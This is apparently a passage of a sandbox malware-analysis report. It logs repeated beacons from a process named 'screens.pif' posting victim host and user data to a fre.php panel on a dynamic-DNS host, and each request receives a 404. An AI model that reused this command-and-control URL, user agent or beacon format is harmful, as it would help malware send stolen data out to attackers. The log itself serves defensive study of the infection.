Oct 3, 2024 09:21:42.317760944 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:43.028489113 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.10	49755	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:43.177519083 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:43.182437897 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:43.857722044 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.10	49756	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:44.014039993 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:44.019040108 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:44.831837893 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.10	49757	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:44.994793892 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:44.999700069 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:45.677170038 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.10	49758	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:45.836055040 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:45.841002941 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:46.484633923 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.10	49759	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:46.635745049 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:46.640568972 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:47.380162954 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.10	49760	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:47.534284115 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:47.539145947 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:48.314477921 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.10	49761	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:48.480703115 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:48.485569954 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:49.257085085 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.10	49762	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:50.346766949 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:50.351787090 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:51.014981031 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.10	49763	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:51.162585020 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:51.167462111 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:51.932621002 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.10	49764	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:52.082454920 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:52.087418079 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:52.836091042 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.10	49765	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:52.990757942 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:52.996562004 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:53.876535892 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.10	49766	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:54.034754038 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:54.039700985 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:54.812823057 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.10	49767	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:54.979121923 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:54.984251976 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:55.759599924 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.10	49768	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:55.920949936 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:55.928869009 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:57.049071074 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:21:57.049649954 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.10	49769	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:57.204504013 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:57.209846973 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:58.038119078 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.10	49770	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:58.201560020 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:58.212197065 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:59.153633118 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.10	49771	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:59.304949045 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:59.314368963 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:00.071734905 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.10	49772	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:00.220202923 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:00.225164890 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:01.203999043 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.10	49773	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:01.527808905 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:01.533864021 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:02.272135973 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.10	49774	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:02.428755045 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:02.438719034 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:03.139327049 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.10	49775	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:03.290683031 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:03.295902014 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
